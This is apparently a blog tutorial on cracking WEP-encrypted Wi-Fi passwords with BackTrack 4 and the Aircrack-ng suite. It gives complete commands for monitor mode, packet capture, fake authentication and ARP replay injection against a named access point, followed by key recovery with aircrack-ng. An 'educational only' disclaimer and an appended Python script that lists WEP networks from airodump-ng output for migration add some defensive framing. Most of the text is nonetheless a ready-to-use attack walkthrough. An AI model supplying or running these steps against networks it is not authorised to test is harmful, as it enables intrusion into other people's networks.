Today I will show you how to hack a wireless network and get the password. The purpose of this tutorial is to show you that WEP encryption is not secure at all and can be cracked within minutes!

Warning: do not try to hack a private network. This tutorial is for educational purposes only and for security experts to discover weak points in wireless networks. Please try it on your own network.

What you need:

Time: 5 min - ??! (varies according to network activity)
Difficulty: Easy!! (you should have some Linux experience)
Target wireless network: WEP encryption.
Software used: BackTrack 4, Aircrack-ng suite (already installed in BackTrack 4)
Hardware used: TP-Link TL-WN321G USB wireless adapter.

How To Hack WEP Wireless Network!

Note: this is the straightforward version of the technique; a lot of problems can arise, and there are a lot of solutions too (read more at the Aircrack-ng website).

1. Start monitor mode on your wireless adapter:
"airmon-ng start wlan0"
(my wireless adapter is wlan0; change it according to what you have).

2. Start airodump-ng to search for nearby wireless networks:
"airodump-ng mon0"

3. After you have decided which wireless network you want to hack, stop airodump-ng by pressing "ctrl" + "c", but you have to note some information about the target network, such as its BSSID (the MAC address of the access point) and its channel.

As you can see from the image above, my target network is called (ESSID) "MusimieNetwork", its BSSID is 00-23-CD-F4-F9-AE and it is working on channel (CH) 6.

4. Now we will make an authentication request:
"aireplay-ng -1 0 -a 00-23-CD-F4-F9-AE mon0"
-1 : fake authentication mode (the 0 after it is the re-authentication delay).
-a : the MAC address (BSSID) of the target network (00-23-CD-F4-F9-AE)
mon0 : the wireless interface.

Notice the "authentication successful" result!

5. We will start collecting packets and saving them to a file:
"airodump-ng -c 6 -w hack mon0"
-c : the channel of the target network.
-w : write what we collect to files with the prefix "hack".
mon0 : my adapter.

After starting the packet collection...

6. You have to wait until you have collected more than 20,000 IVs; watch the "#Data" column. If the network has good traffic and the data count is increasing rapidly you can skip to step 8; if you don't have much traffic you have to generate some (go to step 7).

7. Now we will increase the traffic on the network by capturing packets and replaying them to the access point:
"aireplay-ng -3 -b 00-23-CD-F4-F9-AE -h 00-25-86-E8-D0-AB mon0"
-b : MAC address (BSSID) of the target network.
-h : my MAC address (00-25-86-E8-D0-AB) (optional if you have only one wireless card).

Sometimes you have to wait 5-10 minutes to see actual traffic.

8. Now open another terminal and type:
"aircrack-ng hack-01.cap"

hack-01.cap is the file in which we saved the collected packets (yes, you have to add -01.cap to the prefix you gave to -w).

If you are lucky enough and there are enough packets you will get the password within seconds!

If not, aircrack-ng will try again automatically after it gets another 5,000 packets!
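Besides the .cap file, the -w prefix from step 5 also makes airodump-ng write a hack-01.csv summary of everything it saw. The script below is an added example (not part of the original tutorial): it reads such a dump and lists every network still advertising WEP, with the IV count captured so far, so an administrator auditing their own site knows which access points to migrate to WPA2 first. The CSV content is a constructed sample in the layout airodump-ng produces (column names and table order assumed from the tool's output; MACs written with colons as the tool prints them).

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv
# (assumed: an access-point table, a blank line, then a station table).
# BSSID, ESSID and channel are the values from the tutorial above.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:CD:F4:F9:AE, 2010-03-01 20:01:10, 2010-03-01 20:04:32,  6,  54, WEP , WEP, OPN, -40,  312,  21340,   0.  0.  0.  0,  14, MusimieNetwork, 
00:11:22:33:44:55, 2010-03-01 20:01:12, 2010-03-01 20:04:30, 11,  54, WPA2, CCMP, PSK, -67,  280,      0,   0.  0.  0.  0,   9, OfficeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:25:86:E8:D0:AB, 2010-03-01 20:02:00, 2010-03-01 20:04:31, -50,  900, 00:23:CD:F4:F9:AE, 
"""


def parse_access_points(text):
    """Return the access-point table of an airodump-ng CSV dump as dicts.
    Only the first table is read; the station table is ignored."""
    normalized = text.replace("\r\n", "\n").lstrip()
    ap_table = normalized.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_table), skipinitialspace=True)
    # the tool pads fields with spaces, so strip every key and value
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k}
            for row in reader]


def wep_networks(text, iv_threshold=20000):
    """List every network still using WEP with the IV count captured so far;
    above_threshold marks those past the ~20,000 IVs the tutorial quotes."""
    findings = []
    for ap in parse_access_points(text):
        if not ap["Privacy"].startswith("WEP"):
            continue
        ivs = int(ap["# IV"] or 0)
        findings.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": ivs,
            "above_threshold": ivs >= iv_threshold,
        })
    return findings


if __name__ == "__main__":
    for f in wep_networks(SAMPLE_CSV):
        print(f"WEP still in use: {f['essid']} ({f['bssid']}) on channel "
              f"{f['channel']}, {f['ivs']} IVs seen -> migrate to WPA2")
```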

  • This whole process took me no more than 3 mins!!


